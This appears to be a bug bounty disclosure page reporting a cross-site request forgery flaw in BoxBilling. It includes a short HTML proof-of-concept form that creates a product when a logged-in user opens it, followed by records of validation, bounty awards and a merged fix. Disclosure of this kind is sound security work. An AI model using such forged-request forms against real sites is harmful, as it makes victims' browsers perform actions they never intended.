Cross-Site Request Forgery (CSRF) in boxbilling/boxbilling


Reported on

Apr 26th 2021

✍️ Description


🕵️‍♂️ Proof of Concept

i see whole boxbilling software is vulnerable to csrf bug . There is no protection for csrf attack

the csrf attack poc will be bellow code

<form action="" method="post" id="myForm">
<input type=hidden name=type value="custom">
<input type=hidden name=product_category_id value="1">
<input type=hidden name=title value="csrf">
  <input type="submit" value="Submit">

In this html code change your sitename and save the file as html . Now logged in into boxbilling account and open this file in your same browser and see a product is created using csrf attack every request is vulnerable for csrf attack

💥 Impact


Yağızhan validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Belle Aerni submitted a
2 years ago
Belle Aerni
2 years ago

Patch has been merged into BoxBilling's master branch

Timothy Webb Sr marked this as fixed with commit 42cde7 2 years ago
Belle Aerni has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation